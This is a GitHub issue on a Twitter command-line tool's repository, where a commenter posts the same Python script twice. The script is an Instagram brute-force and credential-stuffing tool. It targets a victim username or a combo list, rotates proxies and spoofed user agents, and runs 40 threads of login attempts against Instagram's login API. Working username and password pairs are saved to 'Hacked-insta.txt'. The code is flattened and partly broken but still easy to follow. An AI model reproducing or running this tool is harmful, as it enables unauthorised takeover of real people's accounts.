sferik / t-ruby

A command-line power tool for Twitter.
MIT License
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B #453

Open Op6p opened 2 years ago

Op6p commented 2 years ago

import os try: import requests,random,threading from time import sleep except Exception as Joker:exit(Joker) PRNT=threading.Lock() def vv1ck(*a, *b): with PRNT:print(a, **b) sent=requests.session() uuid = sent.get('https://httpbin.org/uuid') red = "\033[1;31;40m";yel = '\033[1;33;40m' grn = '\033[1;32;40m';wit = "\033[1;37;40m" errorPas = 'The password you entered is incorrect';login = 'logged_in_user' errorNam = "Please check your username and try again." none = 'Invalid Parameters' band_use = 'inactive user' secure = 'challenge_required' withs = 'Please wait a few minutes before you try again';errReq = 'Bad request' errorFUOt = "We're working on it and we'll get it fixed as soon as we can." def Exit():exit(0) def SeveHck(user,pess): with open('Hacked-insta.txt', 'a') as J: J.write(user+':'+pess+'\n') def SeveScour(user,pess): with open('secure-insta.txt', 'a') as J: J.write(user+':'+pess+'\n') def SeveBand(user,pess): with open('Band-insta.txt', 'a') as J: J.write(user+':'+pess+'\n') def User_Agent(): dpi_phone = [ '133','320','515','160','640','240','120' '800','480','225','768','216','1024'] model_phone = [ 'Nokia 2.4','HUAWEI','Galaxy', 'Unlocked Smartphones','Nexus 6P', 'Mobile Phones','Xiaomi', 'samsung','OnePlus'] pxl_phone = [ '623x1280','700x1245','800x1280', '1080x2340','1320x2400','1242x2688'] i_version = [ '','', '','', '',''] User_Agent = f'Instagram '+random.choice(i_version)+' Android (30/3.0; '+random.choice(dpi_phone)+'dpi; '+random.choice(pxl_phone)+'; huawei/google; '+random.choice(model_phone)+'; angler; angler; en_US)' return User_Agent

class randoomPas: def init(self): global modeRnd print('━━━━━━━━━━━━━━━Random Hack━━━━━━━━━━━━━━') self.mod = modeRnd self.user='' if modeRnd == '1':self.user = input("[$] Enter the victim's username : ") elif modeRnd == 2:pass self.pr = input('[$] Enter name file proxy : ') try:self.proxy = open(self.pr,'r').read().splitlines() except FileNotFoundError: exit('\n[-] The file name is incorrect !\n') self.lst1 = 'm5nbvc_xzl9paqk4jhgfd7swert.yu2io' self.lst2 = '!q5wKert1y@.uio2p8as_dfg3hjVklzx?cv7bnJm0@' print(' ') self.random_Pass() def random_Pass(self): lst1 = 'm5nbvc_xzl9paqk4jhgfd7swert.yu2io' lst2 = '!q5wKert1y@.uio2p8as_dfg3hjVklzx?cv7bnJm0@' while True: sleep(3) if self.mod == '2': self.user = str(''.join((random.choice(lst1) for i in range(4)))) pess = str(''.join((random.choice(lst2) for i in range(11)))) proxylist = [] for pro in self.proxy: proxylist.append(pro) run = str(random.choice(proxylist)) headers = { 'Host':'i.instagram.com', 'Accept':'/', 'User-Agent': User_Agent(), 'Cookie':'missing', 'Accept-Encoding':'gzip, deflate', 'Accept-Language':'en-US', 'X-IG-Capabilities':'3brTvw==', 'X-IG-Connection-Type':'WIFI', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', } data = { 'uuid':uuid.json()['uuid'], 'password':pess, 'username':self.user, 'device_id':uuid.json()['uuid'], 'from_reg':'false', '_csrftoken':'missing', 'login_attempt_countn':'0'} try: PROXY = {"https":run,"http":run} get = sent.post('https://i.instagram.com/api/v1/accounts/login/', headers=headers, data=data, proxies=PROXY, allow_redirects=True) if login in get.text: vv1ck(grn+f'[+] Hacked >> {self.user}:{pess}') threading.Thread(target=SeveHck(self.user,pess)).start() elif errorPas in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif 'unusable_password' in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif errorNam in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif band_use in get.text: vv1ck(yel+f'[-] Account Banned >> {self.user}:{pess}') threading.Thread(target=SeveHck(self.user,pess)).start() elif secure in get.text: vv1ck(yel+f'[!] secure >> {self.user}:{pess}') threading.Thread(target=SeveScour(self.user,pess)).start() elif 'ip_block' in get.text: vv1ck(red+'[-] bad proxy ..') elif errorFUOt in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif withs in get.text: vv1ck(red+'[-] bad proxy ..') elif errReq in get.text:pass elif none in get.text:pass else: print(get.text) except requests.exceptions.ConnectionError: vv1ck(red+'[-] bad proxy ..') except KeyboardInterrupt:Exit() class ComboHck: def init(self): print('━━━━━━━━━━━━━━━Combo Hack━━━━━━━━━━━━━━') self.c = input('[$] Enter name file combo : ') try:self.file = open(self.c, 'r') except FileNotFoundError: exit('\n[-] The file name is incorrect !\n') self.pr = input('[$] Enter name file proxy : ') try:self.proxy = open(self.pr,'r').read().splitlines() except FileNotFoundError: exit('\n[-] The file name is incorrect !\n') self.msg = input("""[$] Do you use a computer or mobile phone? [1] - computer [2] - mobile """) print(' ') self.Trts() def Log_Combo(self): while True: list = self.file.readline().split('\n')[0] user = list.split(':')[0] if user=='': threading.Thread(target=Exit).start() exit() try:pess = list.split(':')[1] except IndexError:pass else: proxylist = [] for pro in self.proxy: proxylist.append(pro) run = str(random.choice(proxylist)) headers = { 'Host':'i.instagram.com', 'Accept':'/', 'User-Agent': User_Agent(), 'Cookie':'missing', 'Accept-Encoding':'gzip, deflate', 'Accept-Language':'en-US', 'X-IG-Capabilities':'3brTvw==', 'X-IG-Connection-Type':'WIFI', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', } data = { 'uuid':uuid.json()['uuid'], 'password':pess, 'username':user, 'device_id':uuid.json()['uuid'], 'from_reg':'false', '_csrftoken':'missing', 'login_attempt_countn':'0'} try: if self.msg == '1':PROXY = {"https://":run,"http://":run} else:PROXY = {"https":run,"http":run} get = sent.post('https://i.instagram.com/api/v1/accounts/login/', headers=headers, data=data, proxies=PROXY, allow_redirects=True) if login in get.text: print(grn+f'[+] Hacked >> {user}:{pess}') threading.Thread(target=SeveHck(user,pess)).start() elif errorPas in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif 'unusable_password' in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif errorNam in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif band_use in get.text: vv1ck(yel+f'[-] Account Banned >> {user}:{pess}') threading.Thread(target=SeveHck(user,pess)).start() elif secure in get.text: vv1ck(yel+f'[!] secure >> {user}:{pess}') threading.Thread(target=SeveScour(user,pess)).start() elif 'ip_block' in get.text: vv1ck(red+'[-] bad proxy ..') elif errorFUOt in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif withs in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif errReq in get.text:pass elif none in get.text:pass else: vv1ck(get.text) except requests.exceptions.ConnectionError: print(red+'[-] bad proxy ..') except KeyboardInterrupt:Exit() def Trts(self): theards =[] for i in range(40): trts = threading.Thread(target=self.Log_Combo) trts.start() theards.append(trts) for trts2 in theards: trts2.join() def start(): global modeRnd mode = input("""\t\t\t\t Brute Force instagram /\ / https://vv1ck.github.io
\ \
_ _ /  @ @

/ \ =>X<=
/| | / [1]- hack from combo list | /| | [2]- random hack ___\ __\ Enter Mode : """) if mode == '2': modeRnd = input(""" [1] - hack penetration + random password [2] - hack random username and password [3] - Go Back << : """) if modeRnd == '1':randoomPas() elif modeRnd =='2':randoomPas() elif modeRnd == '3': os.system('clear') return start() else:exit('Option does not exist') elif mode == '1': ComboHck() else: print(""" Please choose one of the numbers mentioned only [ 1 / 2 ]""") start()

Op6p commented 2 years ago

import os try: import requests,random,threading from time import sleep except Exception as Joker:exit(Joker) PRNT=threading.Lock() def vv1ck(*a, *b): with PRNT:print(a, **b) sent=requests.session() uuid = sent.get('https://httpbin.org/uuid') red = "\033[1;31;40m";yel = '\033[1;33;40m' grn = '\033[1;32;40m';wit = "\033[1;37;40m" errorPas = 'The password you entered is incorrect';login = 'logged_in_user' errorNam = "Please check your username and try again." none = 'Invalid Parameters' band_use = 'inactive user' secure = 'challenge_required' withs = 'Please wait a few minutes before you try again';errReq = 'Bad request' errorFUOt = "We're working on it and we'll get it fixed as soon as we can." def Exit():exit(0) def SeveHck(user,pess): with open('Hacked-insta.txt', 'a') as J: J.write(user+':'+pess+'\n') def SeveScour(user,pess): with open('secure-insta.txt', 'a') as J: J.write(user+':'+pess+'\n') def SeveBand(user,pess): with open('Band-insta.txt', 'a') as J: J.write(user+':'+pess+'\n') def User_Agent(): dpi_phone = [ '133','320','515','160','640','240','120' '800','480','225','768','216','1024'] model_phone = [ 'Nokia 2.4','HUAWEI','Galaxy', 'Unlocked Smartphones','Nexus 6P', 'Mobile Phones','Xiaomi', 'samsung','OnePlus'] pxl_phone = [ '623x1280','700x1245','800x1280', '1080x2340','1320x2400','1242x2688'] i_version = [ '','', '','', '',''] User_Agent = f'Instagram '+random.choice(i_version)+' Android (30/3.0; '+random.choice(dpi_phone)+'dpi; '+random.choice(pxl_phone)+'; huawei/google; '+random.choice(model_phone)+'; angler; angler; en_US)' return User_Agent

class randoomPas: def init(self): global modeRnd print('━━━━━━━━━━━━━━━Random Hack━━━━━━━━━━━━━━') self.mod = modeRnd self.user='' if modeRnd == '1':self.user = input("[$] Enter the victim's username : ") elif modeRnd == 2:pass self.pr = input('[$] Enter name file proxy : ') try:self.proxy = open(self.pr,'r').read().splitlines() except FileNotFoundError: exit('\n[-] The file name is incorrect !\n') self.lst1 = 'm5nbvc_xzl9paqk4jhgfd7swert.yu2io' self.lst2 = '!q5wKert1y@.uio2p8as_dfg3hjVklzx?cv7bnJm0@' print(' ') self.random_Pass() def random_Pass(self): lst1 = 'm5nbvc_xzl9paqk4jhgfd7swert.yu2io' lst2 = '!q5wKert1y@.uio2p8as_dfg3hjVklzx?cv7bnJm0@' while True: sleep(3) if self.mod == '2': self.user = str(''.join((random.choice(lst1) for i in range(4)))) pess = str(''.join((random.choice(lst2) for i in range(11)))) proxylist = [] for pro in self.proxy: proxylist.append(pro) run = str(random.choice(proxylist)) headers = { 'Host':'i.instagram.com', 'Accept':'/', 'User-Agent': User_Agent(), 'Cookie':'missing', 'Accept-Encoding':'gzip, deflate', 'Accept-Language':'en-US', 'X-IG-Capabilities':'3brTvw==', 'X-IG-Connection-Type':'WIFI', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', } data = { 'uuid':uuid.json()['uuid'], 'password':pess, 'username':self.user, 'device_id':uuid.json()['uuid'], 'from_reg':'false', '_csrftoken':'missing', 'login_attempt_countn':'0'} try: PROXY = {"https":run,"http":run} get = sent.post('https://i.instagram.com/api/v1/accounts/login/', headers=headers, data=data, proxies=PROXY, allow_redirects=True) if login in get.text: vv1ck(grn+f'[+] Hacked >> {self.user}:{pess}') threading.Thread(target=SeveHck(self.user,pess)).start() elif errorPas in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif 'unusable_password' in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif errorNam in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif band_use in get.text: vv1ck(yel+f'[-] Account Banned >> {self.user}:{pess}') threading.Thread(target=SeveHck(self.user,pess)).start() elif secure in get.text: vv1ck(yel+f'[!] secure >> {self.user}:{pess}') threading.Thread(target=SeveScour(self.user,pess)).start() elif 'ip_block' in get.text: vv1ck(red+'[-] bad proxy ..') elif errorFUOt in get.text: vv1ck(red+f'[-] Not hacked >> {self.user}:{pess}') elif withs in get.text: vv1ck(red+'[-] bad proxy ..') elif errReq in get.text:pass elif none in get.text:pass else: print(get.text) except requests.exceptions.ConnectionError: vv1ck(red+'[-] bad proxy ..') except KeyboardInterrupt:Exit() class ComboHck: def init(self): print('━━━━━━━━━━━━━━━Combo Hack━━━━━━━━━━━━━━') self.c = input('[$] Enter name file combo : ') try:self.file = open(self.c, 'r') except FileNotFoundError: exit('\n[-] The file name is incorrect !\n') self.pr = input('[$] Enter name file proxy : ') try:self.proxy = open(self.pr,'r').read().splitlines() except FileNotFoundError: exit('\n[-] The file name is incorrect !\n') self.msg = input("""[$] Do you use a computer or mobile phone? [1] - computer [2] - mobile """) print(' ') self.Trts() def Log_Combo(self): while True: list = self.file.readline().split('\n')[0] user = list.split(':')[0] if user=='': threading.Thread(target=Exit).start() exit() try:pess = list.split(':')[1] except IndexError:pass else: proxylist = [] for pro in self.proxy: proxylist.append(pro) run = str(random.choice(proxylist)) headers = { 'Host':'i.instagram.com', 'Accept':'/', 'User-Agent': User_Agent(), 'Cookie':'missing', 'Accept-Encoding':'gzip, deflate', 'Accept-Language':'en-US', 'X-IG-Capabilities':'3brTvw==', 'X-IG-Connection-Type':'WIFI', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', } data = { 'uuid':uuid.json()['uuid'], 'password':pess, 'username':user, 'device_id':uuid.json()['uuid'], 'from_reg':'false', '_csrftoken':'missing', 'login_attempt_countn':'0'} try: if self.msg == '1':PROXY = {"https://":run,"http://":run} else:PROXY = {"https":run,"http":run} get = sent.post('https://i.instagram.com/api/v1/accounts/login/', headers=headers, data=data, proxies=PROXY, allow_redirects=True) if login in get.text: print(grn+f'[+] Hacked >> {user}:{pess}') threading.Thread(target=SeveHck(user,pess)).start() elif errorPas in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif 'unusable_password' in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif errorNam in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif band_use in get.text: vv1ck(yel+f'[-] Account Banned >> {user}:{pess}') threading.Thread(target=SeveHck(user,pess)).start() elif secure in get.text: vv1ck(yel+f'[!] secure >> {user}:{pess}') threading.Thread(target=SeveScour(user,pess)).start() elif 'ip_block' in get.text: vv1ck(red+'[-] bad proxy ..') elif errorFUOt in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif withs in get.text: vv1ck(red+f'[-] Not hacked >> {user}:{pess}') elif errReq in get.text:pass elif none in get.text:pass else: vv1ck(get.text) except requests.exceptions.ConnectionError: print(red+'[-] bad proxy ..') except KeyboardInterrupt:Exit() def Trts(self): theards =[] for i in range(40): trts = threading.Thread(target=self.Log_Combo) trts.start() theards.append(trts) for trts2 in theards: trts2.join() def start(): global modeRnd mode = input("""\t\t\t\t Brute Force instagram /\ / https://vv1ck.github.io
\ \
_ _ /  @ @

/ \ =>X<=
/| | / [1]- hack from combo list | /| | [2]- random hack ___\ __\ Enter Mode : """) if mode == '2': modeRnd = input(""" [1] - hack penetration + random password [2] - hack random username and password [3] - Go Back << : """) if modeRnd == '1':randoomPas() elif modeRnd =='2':randoomPas() elif modeRnd == '3': os.system('clear') return start() else:exit('Option does not exist') elif mode == '1': ComboHck() else: print(""" Please choose one of the numbers mentioned only [ 1 / 2 ]""") start()